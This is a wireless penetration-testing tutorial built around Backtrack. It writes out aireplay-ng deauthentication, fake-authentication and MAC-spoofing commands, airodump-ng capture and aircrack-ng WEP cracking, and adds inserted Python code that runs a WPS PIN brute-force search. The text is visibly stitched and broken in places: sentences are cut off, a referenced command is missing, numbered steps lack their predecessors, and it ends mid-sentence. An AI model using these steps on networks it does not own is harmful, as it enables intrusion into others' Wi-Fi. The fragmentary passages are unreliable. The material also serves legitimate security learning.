Wireless Security and Pentest Tutorial Using Backtrack
A tutorial on network security and penetration testing using Backtrack, covering
networking basics, wireless network basics, wireless penetration and securing wireless
networks.
Independent Study
by Nuno Freitas
27/05/2012
Executive Summary
Over the past months I've been learning about network security. I started by reading
documents like this one, and I'm writing this tutorial not to teach anyone how to break
into a neighbour's network and get free internet or valuable information. No. I'm
writing it because, even though I'm not an expert, I hope it can be useful to those
who don't know where to begin learning about the subject.
Backtrack, currently in its fifth version (Backtrack 5), is an operating system based
on the Ubuntu GNU/Linux distribution and aimed at digital forensics and penetration
testing. It is named after backtracking, a search algorithm.
Backtrack ships with a large number of tools. I'll be talking about some that already
come with Backtrack and some others that you need to install if you are using a version
older than Backtrack 5 R2; this document also describes how to install those programs.
Throughout the document, imagine that I am an attacker targeting wireless networks.
In this tutorial I'll be using one computer running Windows 7 with VMware, in which
Backtrack 5 R2 is installed: the attacker machine.
I will use two routers throughout the tutorials, because my old router (Conceptronic
C54BRS4) doesn't support WPS, which I need in order to test Reaver, so for that part I'll
use a TP-LINK TL-WR841ND.
Don't forget that the attacker PC must use a wireless card that supports packet
injection in order to perform some of the attacks.
My Setup
Before we start with the ARP protocol, let's recall what physical addresses and logical
addresses are.
Physical addresses: what we know as the MAC (Media Access Control) address, which is
tied to a network interface. It is 48 bits long (12 hexadecimal characters).
Logical addresses: what we usually call IP addresses.
How does the ARP protocol work?
On a local network, when a computer wants to reach another one it knows the IP address
of that computer, but the frame it puts on the wire has to carry the MAC address of the
destination.
When you only know the IP you have to ask for the MAC, and that is what ARP (Address
Resolution Protocol) does: it resolves IP addresses into MAC addresses.
For example, imagine a computer, Computer A, with IP 192.168.2.105, that wants to
communicate with Computer B, which has IP 192.168.2.100.
Computer A checks its ARP table and, if it has no entry for Computer B's MAC address,
sends a frame to the broadcast address FF:FF:FF:FF:FF:FF asking for the MAC address
of the host that owns Computer B's IP (ARP REQUEST).
Computer B then answers Computer A with its physical address, and Computer A adds an
entry to its ARP table mapping Computer B's IP to that MAC address (ARP REPLY).
You can check your ARP table by typing at a command prompt:
#arp -a
It is also possible to translate MAC addresses into IP addresses, but the protocol used
for that is RARP (Reverse Address Resolution Protocol).
ARP is one of the most important protocols in networking and one of the easiest to
understand. Note that it has no authentication at all: a host accepts whatever reply
arrives for its request, which is why ARP traffic is so easy to forge and replay.
Up ahead in this tutorial we will talk more about ARP Protocol.
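The exchange described above, as an added example that is not part of the original tutorial: it builds and parses ARP packets in their RFC 826 wire format and models the ARP table of Computer A (192.168.2.105) and Computer B (192.168.2.100). The MAC addresses are constructed for the example.

```python
import struct

ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FMT = "!HHBBH6s4s6s4s"   # RFC 826 body for Ethernet/IPv4: 28 bytes


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_to_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def bytes_to_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Serialize an ARP packet. A request carries an all-zero target MAC (that is the
    field being asked for) and rides in an Ethernet frame addressed to
    ff:ff:ff:ff:ff:ff so every host on the segment sees it."""
    return struct.pack(ARP_FMT,
                       1,              # hardware type 1 = Ethernet
                       0x0800,         # protocol type = IPv4
                       6, 4,           # hardware / protocol address lengths
                       opcode,
                       mac_to_bytes(sender_mac), ip_to_bytes(sender_ip),
                       mac_to_bytes(target_mac), ip_to_bytes(target_ip))


def parse_arp(pkt):
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, pkt[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"op": op,
            "sender_mac": bytes_to_mac(sha), "sender_ip": bytes_to_ip(spa),
            "target_mac": bytes_to_mac(tha), "target_ip": bytes_to_ip(tpa)}


class Host:
    """Minimal model of a host's ARP behaviour: a cache plus request/reply handling."""

    def __init__(self, mac, ip):
        self.mac, self.ip = mac, ip
        self.arp_table = {}          # what `arp -a` would print: ip -> mac

    def resolve(self, ip):
        """Return the ARP request to broadcast, or None if the MAC is already cached."""
        if ip in self.arp_table:
            return None
        return build_arp(ARP_REQUEST, self.mac, self.ip, "00:00:00:00:00:00", ip)

    def receive(self, pkt):
        """Handle an incoming ARP packet; return a reply if it asks for our IP."""
        arp = parse_arp(pkt)
        if arp["target_ip"] != self.ip:
            return None
        # There is no authentication anywhere in ARP: the sender fields are trusted
        # as-is, which is what makes ARP so easy to forge and replay.
        self.arp_table[arp["sender_ip"]] = arp["sender_mac"]
        if arp["op"] == ARP_REQUEST:
            return build_arp(ARP_REPLY, self.mac, self.ip, arp["sender_mac"], arp["sender_ip"])
        return None


def demo():
    """Computer A (192.168.2.105) resolves Computer B (192.168.2.100) as in the text.
    The MAC addresses are constructed for the example."""
    a = Host("00:11:22:33:44:55", "192.168.2.105")
    b = Host("66:77:88:99:aa:bb", "192.168.2.100")
    request = a.resolve(b.ip)        # ARP REQUEST, sent to ff:ff:ff:ff:ff:ff
    reply = b.receive(request)       # B recognises its own IP and answers
    a.receive(reply)                 # ARP REPLY: A caches B's MAC
    return a.arp_table
```

Running demo() leaves Computer A's table with a single entry for 192.168.2.100; a second resolve() for the same IP returns None because the cache answers it, exactly what you see with arp -a after the first ping.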
Wireless Networks
There are two families of encryption in wireless networks: WEP, which stands for
Wired Equivalent Privacy, and WPA, which stands for Wi-Fi Protected Access (with its
successor WPA2). Although WPA is far more secure than WEP, both are vulnerable to
different types of attacks, as we will see.
WPA
Wi-Fi Protected Access (WPA) is a software/firmware improvement over WEP.
Regular WLAN equipment that worked with WEP could usually be upgraded to WPA, so no
new hardware had to be bought. WPA is a trimmed-down version of the 802.11i security
standard that was developed by the IEEE 802.11 working group to replace WEP.
The TKIP (Temporal Key Integrity Protocol) encryption algorithm was developed for
WPA to provide improvements to WEP that could be fielded as firmware upgrades to
existing 802.11 devices. The WPA profile also provides optional support for the AES-CCMP algorithm, which is the preferred algorithm in 802.11i and WPA2.
WPA Enterprise provides RADIUS-based authentication using 802.1X.
WPA Personal uses a pre-shared key (PSK) derived from an 8 to 63 character passphrase.
The PSK may also be entered directly as a 64 character hexadecimal string.
Weak PSK passphrases can be broken with a dictionary attack by capturing the four-way
handshake when a client connects to the network or reconnects after being
deauthenticated.
WPA Personal is secure when used with a good passphrase or a full 64 character
hexadecimal key. WPS (Wi-Fi Protected Setup) should also be disabled, since a serious
vulnerability in its PIN authentication was discovered and is already being exploited
(see Reaver below).
TKIP
This stands for Temporal Key Integrity Protocol; the acronym is pronounced "tee-kip".
It is part of the IEEE 802.11i standard. TKIP implements per-packet key mixing with a
re-keying system and also provides a message integrity check (MIC). These avoid the
known problems of WEP, although TKIP has since been attacked itself (see tkiptun-ng in
the Aircrack-ng suite below).
EAP
WPA builds on the IEEE 802.1X standard, which had already improved authentication and
authorization for access to wireless and wired LANs. On top of this, the Extensible
Authentication Protocol (EAP) adds a further layer of security, because EAP
authentication is performed against a central authentication server.
Unfortunately, in 2002 a University of Maryland professor discovered some shortcomings
in the 802.1X design.
802.11i security
The newest and most rigorous security to implement in WLANs today is the 802.11i RSN
(Robust Security Network) standard. The full 802.11i standard (marketed as WPA2)
requires newer hardware, unlike WPA, so it may mean buying new equipment. That
hardware may implement either AES-WRAP (from an early draft of 802.11i) or the newer
and better AES-CCMP.
WPA2
WPA2 is the Wi-Fi Alliance branded version of the final 802.11i standard. The primary
enhancement over WPA is the inclusion of the AES-CCMP algorithm as a mandatory
feature. Both WPA and WPA2 support EAP authentication methods using RADIUS
servers as well as pre-shared keys (PSK).
CCMP
CCMP stands for Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (also known as CCM mode Protocol). It is the encryption protocol defined
by the IEEE 802.11i amendment to the original IEEE 802.11 standard. CCMP is an
enhanced data cryptographic encapsulation mechanism designed for data confidentiality
and integrity, based on the Counter Mode with CBC-MAC (CCM) mode of AES. It was
created to address the vulnerabilities of TKIP, the protocol used in WPA, and of WEP, a
dated and insecure protocol.
802.11b
802.11b has a maximum raw data rate of 11 Mbit/s and uses the same media access
method defined in the original standard. 802.11b products appeared on the market in
early 2000, since 802.11b is a direct extension of the modulation technique defined in
the original standard. The dramatic increase in throughput of 802.11b (compared to the
original standard) along with simultaneous substantial price reductions led to the rapid
acceptance of 802.11b as the definitive wireless LAN technology.
802.11b devices suffer interference from other products operating in the 2.4 GHz band.
Devices operating in the 2.4 GHz range include: microwave ovens, Bluetooth devices,
baby monitors and cordless telephones.
802.11g
In June 2003, a third modulation standard was ratified: 802.11g. This works in the
2.4 GHz band (like 802.11b), but uses the same OFDM based transmission scheme as
802.11n
802.11n is an amendment which improves upon the previous 802.11 standards by
adding multiple-input multiple-output antennas (MIMO). 802.11n operates on both the
2.4 GHz and the lesser used 5 GHz bands. The IEEE has approved the amendment and
it was published in October 2009. Prior to the final ratification, enterprises were already
migrating to 802.11n networks based on the Wi-Fi Alliance's certification of products
conforming to a 2007 draft of the 802.11n proposal.
Software
During the next tutorials I'll be using several programs under Backtrack 5, so let's give
a brief explanation of what those programs are and what tasks they can be used for.
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet
sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless
LANs.
It works with any wireless network interface controller whose driver supports raw
monitoring mode and can sniff 802.11b, 802.11g and 802.11n traffic. The program runs
under Linux and Windows.
Features
The aircrack-ng software suite includes:
aircrack-ng - Cracks WEP and WPA (Dictionary attack) keys.
airdecap-ng - Decrypts WEP or WPA encrypted capture files with known key.
airmon-ng - Placing different cards in monitor mode.
aireplay-ng - Packet injector (Linux, and Windows).
airodump-ng - Packet sniffer: Places air traffic into PCAP or IVS files and shows
information about networks.
airtun-ng - Virtual tunnel interface creator.
airolib-ng - Stores and manages ESSID and password lists and precomputes PMKs;
increases the keys-per-second rate of WPA attacks
packetforge-ng - Creates encrypted packets for injection.
airbase-ng - Incorporates techniques for attacking clients, as opposed to access points
airdecloak-ng - removes WEP cloaking from pcap files
airdriver-ng - Tools for managing wireless drivers
tkiptun-ng - WPA/TKIP attack
airserv-ng - allows you to access the wireless card from other computers.
buddy-ng - the helper server for easside-ng, run on a remote computer
easside-ng - a tool for communicating to an access point, without the WEP key
wesside-ng - automatic tool for recovering WEP key
Wireshark
Wireshark is a free and open-source packet analyzer.
It is used for network troubleshooting, analysis, software and communications
protocol development, and education. Originally named Ethereal, in May 2006 the
project was renamed Wireshark due to trademark issues.
Wireshark is very useful because you can analyze every packet individually and
understand what is going on in the airwaves, since Wireshark decodes all the frame
types travelling over the wireless medium.
Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user
interface, and using pcap to capture packets; it runs on various Unix-like operating
systems including Linux, Mac OS X, BSD, and on Microsoft Windows.
Pyrit
Pyrit allows creating massive databases, pre-computing part of the IEEE 802.11
WPA/WPA2-PSK authentication phase in a space-time tradeoff. Exploiting the
computational power of many-core and other platforms through ATI Stream, Nvidia
CUDA, OpenCL and VIA PadLock, it is currently by far the most powerful attack
against one of the world's most used security protocols.
Pyrit is free software. Everyone can inspect, copy or modify it and share derived work
under the GNU General Public License v3+. It compiles and executes on a wide variety
of platforms, including FreeBSD, Mac OS X and Linux as operating systems and x86,
alpha, arm, hppa, mips, powerpc, s390 and sparc processors. Pyrit is a very good
tool, although it's not included in Backtrack 5. In the Pyrit attack tutorial I will also
explain how to install it.
Reaver
Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in
order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested
against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10
hours, depending on the AP. In practice, it will generally take half this time to guess the correct
WPS pin and recover the passphrase.
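Why a PIN brute force finishes in hours rather than years is worth seeing in code. The following is an added example, not Reaver's code: it computes the WPS PIN checksum digit and runs the split search that Reaver relies on (the registrar reveals, through an EAP-NACK after message M4 or M6, whether the first four or the last three digits were wrong). The registrar is simulated by two constructed oracle functions; Reaver's PIN ordering, timeouts and lock-out handling are not reproduced.

```python
def wps_checksum(first7):
    """Checksum digit of a WPS PIN (the 8th digit): weighted sum of the first seven
    digits, weights 3,1,3,1,3,1,3 starting from the most significant digit."""
    accum = 0
    for i, ch in enumerate(first7):
        d = int(ch)
        accum += 3 * d if i % 2 == 0 else d
    return (10 - accum % 10) % 10


def pin_is_valid(pin):
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def search_space():
    """(all 8-digit PINs, PINs with a valid checksum, attempts needed by the split attack)."""
    return 10 ** 8, 10 ** 7, 10 ** 4 + 10 ** 3


def make_ap(real_pin):
    """Simulated registrar (constructed for the example). In the real protocol a NACK
    after M4 means the first half was wrong and a NACK after M6 means the second half
    was wrong; those two leaks are modelled as two oracle functions."""
    def first_half_ok(half):
        return half == real_pin[:4]

    def pin_ok(pin):
        return pin == real_pin
    return first_half_ok, pin_ok


def crack_pin(first_half_ok, pin_ok):
    """The Reaver strategy: fix the first half (at most 10,000 tries), then the second
    half (at most 1,000 tries; the checksum digit is computed, not guessed).
    Returns (pin, attempts)."""
    attempts = 0
    for h1 in range(10 ** 4):
        attempts += 1
        first = f"{h1:04d}"
        if first_half_ok(first):
            break
    else:
        return None, attempts
    for h2 in range(10 ** 3):
        attempts += 1
        first7 = first + f"{h2:03d}"
        pin = first7 + str(wps_checksum(first7))
        if pin_ok(pin):
            return pin, attempts
    return None, attempts
```

With the common default PIN 12345670 the search needs 1,803 attempts; the worst case is 11,000, which at a few seconds per attempt is the 4-10 hours quoted above. A correctly designed protocol would have forced 10^7 attempts against the whole PIN at once.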
Wireshark
So, as you read before, Wireshark is a packet analyzer. Let's learn how to work
with that tool.
Remember that Wireshark can capture on every interface you have. For example you can
create a monitor mode interface and use it in Wireshark; that way you capture every
frame on the air around you and get a large number of packets.
As you already saw with airodump-ng in the Aircrack-ng suite, it is very easy to collect
thousands of packets in minutes or even seconds, depending on the traffic of the
network. It would be hard to find a few data frames among all the beacon frames, but
Wireshark can filter by type of frame or by MAC address. This makes it comfortable to
look for specific types of packet and get to them faster.
First let's talk about WLAN frames; understanding them will help with Wireshark and
with networking in general.
There are three types of frames: management frames, control frames and data frames.
1. Management frames: They are responsible for establishing and maintaining
communication between access points and wireless clients. The main management frame
subtypes are:
-
with the client and, if it accepts, reserves memory for it and assigns an
association ID.
- Beacon: The access point periodically sends a beacon frame to announce its
presence and relay information, such as the timestamp, SSID and other
parameters of the access point, to wireless cards within range. Wireless
cards continually scan the 802.11 radio channels and listen for beacons as
the basis for choosing which access point to associate with.
2. Control frames: Control frames are responsible for ensuring a proper exchange of
data between the access point and wireless clients. Control frames include the
following subtypes:
- Request to Send (RTS)
- Clear to Send (CTS)
- Acknowledgement (ACK): since 802.11 stations cannot transmit and receive at the
same time, a station that is transmitting a frame cannot tell whether the frame was
received or whether there was a collision. Therefore every unicast frame that is
received intact is answered by the receiving 802.11 radio with a 14-octet
acknowledgement (ACK) frame.
3. Data frames: Data frames carry the actual data sent on the wireless network. Data
frames do have subtypes (QoS Data, and Null frames used for power management, for
example), but for filtering purposes the frame type alone is usually what you want.
Now that the different types of WLAN frames have been explained we can start with
Wireshark. This explanation matters because in Wireshark you will get hundreds of
frames and you will need to filter out the ones you don't need to simplify the process.
So, let's start with Wireshark. To start it, type wireshark & in the console.
But before we start sniffing the airwaves let's create a monitor mode interface, so we
capture every frame from every network in range. To do that just type:
#airmon-ng start wlan0
The interface name depends on your device: it could be wlan0, wlan1 and so on, depending
on how many wireless cards you have connected and which one you want to use.
To find out, type:
#airmon-ng
The output will show you how many cards you have and their interface names.
After you put your wireless card in monitor mode you get a new interface named
mon0. That new interface is a virtual interface, which is nothing more than your wireless
card working in monitor mode.
That's the interface we will use in Wireshark.
After you start Wireshark you will see this window:
This is the start window of Wireshark. To get started click Interface List under Capture,
below the Wireshark logo.
You will get the list of available devices you can use to capture packets. mon0 captures
the airwaves on the channel your card is currently tuned to (unlike airodump-ng, Wireshark
does not hop channels, so lock the card to the channel you are interested in), and eth0 or
eth1 captures your wired network.
This is Wireshark capturing packets from the air. As you can see there are some ACK
frames and some data frames. You will get hundreds or even thousands of frames while
sniffing. Imagine we need to find the data frames: it would be very hard to pick them out
among all the other frames by eye, because there are several types of frames and you are
looking for only one. That's where Wireshark's display filters help a lot.
Wireshark Filters
Filter by Destination, Source and Port
eth.src With this filter you can filter by the source MAC Address (Ethernet).
Example: eth.src == 00:11:22:33:44:55
eth.dst With this filter you can filter by destination MAC Address (Ethernet).
Example: eth.dst == 00:11:22:33:44:55
wlan.addr This filter matches a MAC address in any of the 802.11 address fields
(source, destination, BSSID).
Example: wlan.addr == 00:11:22:33:44:55
wlan.sa With this filter you can filter by the source MAC Address (Wireless Card).
Example: wlan.sa == 00:11:22:33:44:55
wlan.da With this filter you can filter by destination MAC Address (Wireless Card).
Example: wlan.da == 00:11:22:33:44:55
wlan.bssid With this filter you can filter only the frames from an specific Access
Point by using the MAC Address (bssid).
Example: wlan.bssid == 00:11:22:33:44:55
ip.addr With this filter you can filter by source or destination IPv4 Address.
Example: ip.addr == 192.168.2.1
ip.dst With this filter you can filter by destination IPv4 Address.
Example: ip.dst == 192.168.2.1
ip.src With this filter you can filter by source IPv4 Address.
Example: ip.src == 192.168.2.1
ipv6.addr With this filter you can filter by source or destination IPv6 Address.
Example: ipv6.addr == 2001::5
ipv6.src With this filter you can filter by source IPv6 Address.
Example: ipv6.src == 2001::5
ipv6.dst With this filter you can filter by destination IPv6 Address.
Example: ipv6.dst == 2001::5
tcp.port With this filter you can filter packets by source or destination TCP port.
Example: tcp.port == 80
tcp.dstport With this filter you can filter packets by destination TCP port.
Example: tcp.dstport == 80
tcp.srcport With this filter you can filter packets by source TCP port.
Example: tcp.srcport == 80
udp.port With this filter you can filter packets by source or destination UDP port.
Example: udp.port == 80
udp.dstport With this filter you can filter packets by destination UDP port.
Example: udp.dstport == 80
udp.srcport With this filter you can filter packets by source UDP port.
Example: udp.srcport == 80
Filter by Types of frames
wlan.fc.type == 0 With this filter you can filter only the Management frames.
wlan.fc.type == 1 With this filter you can filter only the Control frames.
wlan.fc.type == 2 With this filter you can filter only the Data frames.
Filter by Subtypes of frames
The subtype numbers are the ones encoded in the 802.11 Frame Control field, so these
filters work regardless of how Wireshark labels the frame:
(wlan.fc.type == 0) && (wlan.fc.subtype == 0) - Association Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 1) - Association Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 2) - Re-Association Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 3) - Re-Association Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 4) - Probe Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 5) - Probe Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 8) - Beacon frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 10) - Dis-Association frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 11) - Authentication frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 12) - De-Authentication frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 11) - Request to Send frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 12) - Clear to Send frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 13) - Acknowledgement frames.
(wlan.fc.type == 2) - Data frames.
Wireshark also offers the combined field wlan.fc.type_subtype, whose value is
(type << 4) | subtype: wlan.fc.type_subtype == 0x0c is the same as the De-Authentication
filter above, 0x08 is Beacon and 0x1d is Acknowledgement.
Filter Operators
!= - Not equal - Excludes one value of a field.
Imagine that you want all the management frames except beacon frames; use
(wlan.fc.type == 0) && (wlan.fc.subtype != 8)
You can also negate a whole expression with !, for example
(wlan.fc.type == 0) && !(wlan.fc.subtype == 8)
&& - And - Combines two conditions; a frame must match both.
If you want to see only Authentication and De-Authentication frames, use
(wlan.fc.type == 0) && (wlan.fc.subtype == 11 || wlan.fc.subtype == 12)
|| - Or - Combines two conditions as well, but shows frames matching filter 1 OR filter 2.
Note the difference: && narrows the result, || widens it.
Well, on most equipment there is no practical way to prevent these attacks:
deauthentication frames are plain management frames with no authentication, and the
802.11w amendment that protects them is rarely supported on consumer gear. However, it
is simple to confirm whether you are the victim of a deauthentication attack. To do that,
let's use Wireshark.
To get started I will use two computers in this example, one with Backtrack 5 and the
other with Windows 7. The Windows 7 machine is already connected to the network,
TP-LINK. Its role is simple: it will be the victim.
The second machine, running Backtrack, will be the attacker and the monitor. I will
perform a deauthentication attack and at the same time monitor the airwaves for
deauthentication packets with Wireshark.
In your case, if you want to check whether you are the victim of a deauthentication attack,
you can use any machine running Wireshark, which runs on Windows and Linux.
So lets get started, first lets put our wireless card in Monitor mode.
#airmon-ng start wlan1
Then lets check the networks we can reach.
#airodump-ng mon0
Then attack your own network.
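The frame classification from the Wireshark section and the deauthentication check described here, as an added example that is not part of the original tutorial. It decodes the 802.11 Frame Control field the way the wlan.fc.type / wlan.fc.subtype filters see it and counts deauthentication frames per BSSID over a constructed capture that uses the tutorial's AP (00:80:5A:28:B5:AB) and client (00:15:AF:A2:8D:98). The frames are built inline without the trailing FCS; reason code 7 is the one aireplay-ng -0 puts in its frames.

```python
from collections import Counter

MGMT, CTRL, DATA = 0, 1, 2

# (type, subtype) -> name, as the 802.11 Frame Control field encodes them
SUBTYPES = {
    (MGMT, 0): "Association Request",   (MGMT, 1): "Association Response",
    (MGMT, 2): "Reassociation Request", (MGMT, 3): "Reassociation Response",
    (MGMT, 4): "Probe Request",         (MGMT, 5): "Probe Response",
    (MGMT, 8): "Beacon",                (MGMT, 10): "Disassociation",
    (MGMT, 11): "Authentication",       (MGMT, 12): "Deauthentication",
    (CTRL, 11): "RTS", (CTRL, 12): "CTS", (CTRL, 13): "ACK",
    (DATA, 0): "Data", (DATA, 4): "Null", (DATA, 8): "QoS Data",
}


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def unmac(s):
    return bytes.fromhex(s.replace(":", ""))


def parse_frame(frame):
    """Decode Frame Control and the address fields of an 802.11 frame (FCS not included).
    Frame Control is little-endian; byte 0 holds version (bits 0-1), type (2-3), subtype (4-7)."""
    ftype = (frame[0] >> 2) & 0x3
    subtype = (frame[0] >> 4) & 0xF
    info = {
        "type": ftype, "subtype": subtype,
        "name": SUBTYPES.get((ftype, subtype), "unknown"),
        "filter": f"wlan.fc.type == {ftype} && wlan.fc.subtype == {subtype}",
        "addr1": mac(frame[4:10]),               # receiver address, present in every frame
    }
    if ftype != CTRL:                            # CTS and ACK carry only the receiver address
        info["addr2"], info["addr3"] = mac(frame[10:16]), mac(frame[16:22])
    if (ftype, subtype) == (MGMT, 12):           # deauth body: 2-byte reason code
        info["reason"] = int.from_bytes(frame[24:26], "little")
    return info


def build_mgmt(subtype, da, sa, bssid, body=b""):
    """Constructed management frame: FC, duration, addr1=DA, addr2=SA, addr3=BSSID, seq ctrl."""
    fc = bytes([(MGMT << 2) | (subtype << 4), 0])
    return fc + b"\x00\x00" + unmac(da) + unmac(sa) + unmac(bssid) + b"\x00\x00" + body


def build_deauth(client, bssid, reason=7):
    """aireplay-ng -0 style deauth: sent as if from the AP, reason 7 (class 3 frame
    received from a non-associated station)."""
    return build_mgmt(12, client, bssid, bssid, reason.to_bytes(2, "little"))


def build_ack(ra):
    """ACK control frame: FC + duration + RA = 10 bytes, 14 on the air with the FCS."""
    return bytes([(CTRL << 2) | (13 << 4), 0]) + b"\x00\x00" + unmac(ra)


def detect_deauth_flood(frames, threshold=5):
    """Count deauthentication frames per BSSID, i.e. what you would eyeball in Wireshark
    with wlan.fc.type == 0 && wlan.fc.subtype == 12. A healthy network produces a
    handful of these; aireplay-ng produces bursts of them."""
    counts = Counter()
    for frame in frames:
        info = parse_frame(frame)
        if info["name"] == "Deauthentication":
            counts[info["addr3"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


def demo_capture_alert():
    """Constructed capture: two beacons, an ACK, one data frame and ten deauths."""
    ap, client = "00:80:5a:28:b5:ab", "00:15:af:a2:8d:98"
    capture = [build_mgmt(8, "ff:ff:ff:ff:ff:ff", ap, ap) for _ in range(2)]
    capture.append(build_ack(client))
    capture.append(bytes([DATA << 2, 0x01]) + b"\x00\x00" + unmac(ap) + unmac(client) + unmac(ap) + b"\x00\x00")
    capture += [build_deauth(client, ap) for _ in range(10)]
    return detect_deauth_flood(capture)
```

The "filter" string each parsed frame carries is the exact display filter you would type into Wireshark to isolate frames of that kind, and the BSSID in addr3 is what lets you tell a deauth aimed at your network from one belonging to a neighbour.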
Fake Authentication
Fake authentication is useful in WEP attacks; it does not work against WPA
networks.
In WEP cracking we will face two kinds of WEP networks: one with Open System
authentication and the other with Shared Key authentication.
With Open System authentication a fake authentication is simple to perform and you can
start whenever you want; with Shared Key authentication you will always need a
connected client.
If the network has no connected client, wait until someone connects. We need a
legitimate client to show up because we need the 140 byte keystream from its shared key
authentication exchange (saved by airodump-ng as a .xor file) to fake an authentication.
Without it we cannot authenticate. Remember that Open System and Shared Key
authentication work differently.
Open System Fake Authentication
So, imagine you have already figured out your target.
In order for an access point to accept a packet, the source MAC address must already be
associated. If the source MAC address you are injecting from is not associated with the
access point, it will ignore the packet and send out a "Deauthentication".
In this state no new initialization vectors are generated, because the access point is
ignoring all the injected packets. Lack of association with the access point is the
single biggest reason why packet injection fails. Fake authentication only connects you to
the access point and tells it "I'm here and want to talk to you"; it does not give you any
ability to transfer data.
With this you are only looking at the target network. As you saw before, there is a
connected client; its MAC is 00:15:AF:A2:8D:98.
So let's deauthenticate it (-a is the BSSID, -c the client to kick):
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 mon0
After the deauthentication, look at the top line of the airodump-ng window: it now says
140 bytes keystream: 00:80:5A:28:B5:AB
This means airodump-ng has captured the client's shared key authentication exchange and
written the .xor keystream file we need for a fake authentication.
Use the following command (-a is the BSSID, -h the MAC address of your own card, here
74:EA:3A:90:C7:21, -y the keystream file, and the interface is the monitor interface
created by airmon-ng):
#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -y sharedkey-01-00:80:5A:28:B5:AB.xor mon0
Mac Filtering
In some cases you might find additional barriers, like MAC filtering, which is still
easy to bypass. Imagine that you are trying to fake-authenticate with an AP and you get
an error like this:
MAC filtering is enabled on this network. To get past it we need a legitimate MAC
address that is allowed to connect to the AP.
Run airodump-ng and wait until someone connects to that network, or, if someone is
already connected, use their MAC address as your own.
The command shown above changes the MAC address of the wlan1 device to 00:15:AF:A2:8D:98.
Even if the legitimate client stays connected to the network you can begin to
fake-authenticate:
#aireplay-ng -1 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 mon0
This time don't forget to use the spoofed MAC in the -h option.
This brief explanation of fake authentication will help you with the WEP cracking that
we will see later in this tutorial. With this information you shouldn't have any trouble
performing this trick and cracking WEP.
4) Once enough IVs have been captured, run a cryptographic attack to recover the
WEP key (aircrack-ng)
In this case I will attack my own network, so it is as if the attacker (me) had already
identified the WEP encrypted network he wants to crack. The information he needs to
start collecting IVs is the BSSID of the access point and the channel it is operating
on. This is easy to get with airodump-ng, which will also be used to capture the IVs and
save them to a file. Here the BSSID of the network we are trying to crack is
00:80:5A:28:B5:AB, the channel is 11, and we will call the output file wepkey.
Let's put our card in monitor mode, but first you need to know which interface to use:
#airmon-ng
You now have a list of the interfaces on your machine. If you have only one wireless
card you will have only one interface; with two wireless cards you have two interfaces. I
might use different cards throughout the tutorials, so when you see wlan1 and your
interface is wlan0, use wlan0 instead.
Remember that I'm running the attacks on my machine and yours could be different.
So I will use wlan0 for this tutorial. To put that interface in monitor mode use:
#airmon-ng start wlan0
You still have the wlan0 interface, and the system has created a new one called mon0.
This is a virtual interface; "mon" stands for monitor, meaning that mon0 is the interface
capturing traffic, and it is the one to pass to airodump-ng and aireplay-ng from now on.
Now let's look at the networks around us:
#airodump-ng mon0
As I told you before, the network I'm attacking is mine. My network is called WLAN, so
from airodump-ng I already know the BSSID and the channel. Let's get started:
#airodump-ng --channel 11 --bssid 00:80:5A:28:B5:AB --write wepkey mon0
#Data is the number of unique IVs captured so far and saved in wepkey-01.cap.
airodump-ng may create several .cap files (wepkey-01.cap, wepkey-02.cap, ...), which is
why at the end we will give aircrack-ng wepkey*.cap.
#/s is the number of unique IVs we get per second. As you can see there is almost no
traffic on this network; at that rate, collecting 50,000 IVs would mean waiting about
25,000 seconds, almost 7 hours. So why not use packet injection to speed up the
collection of unique IVs?
We can do that using aireplay-ng:
After you get the first ARP request you should see something like the image above. It's
just a matter of time until you have enough IVs for aircrack-ng's statistical (PTW) attack.
Once you have around 50,000 you have a good chance of cracking the key.
If you fail, just repeat the process: capture more IVs and try again. You'll need more
IVs depending on how long the key is. There are 64-bit, 128-bit and 152-bit keys (40, 104
and 128 secret bits once the 24-bit IV is subtracted); more bits means more possible keys
and usually more IVs needed to recover them. So if you fail with 50,000, collect more IVs
and you will get the key.
As you know, the captured data packets containing IVs are stored in the files named
wepkey that airodump-ng writes. The program writes several files to the current directory
in different formats (.cap, .csv, .kismet.csv, .kismet.netxml), but the ones we are
interested in are the .cap files.
For the crack use wepkey*.cap, since there may be more than one .cap file, for example
wepkey-01.cap, wepkey-02.cap.
The attack starts with this command (aircrack-ng takes only capture files, no interface):
#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap
So as you can see it found the WEP key of the network. The key I used for this example
